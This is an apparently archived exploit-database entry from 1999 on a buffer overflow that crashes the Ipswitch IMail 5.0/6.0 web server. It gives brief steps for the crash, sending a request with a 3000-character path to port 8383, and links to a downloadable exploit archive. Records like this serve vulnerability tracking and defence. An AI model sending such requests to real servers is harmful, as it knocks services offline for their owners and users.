Ipswitch IMail 5.0/6.0 - Web Service Buffer Overflow (Denial of Service) (PoC)

EDB-ID:

19380


Type:

dos


Platform:

Multiple

Date:

1999-03-01


source: https://www.securityfocus.com/bid/505/info

The IMail web server can be crashed by requesting an abnormally long URL. 

Telnet to target machine, port 8383

Send: GET /glob1/
Where glob1 is 3000 characters.

Marc Maiffret <marc@eeye.com> has released the following exploit: 

https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19380.zip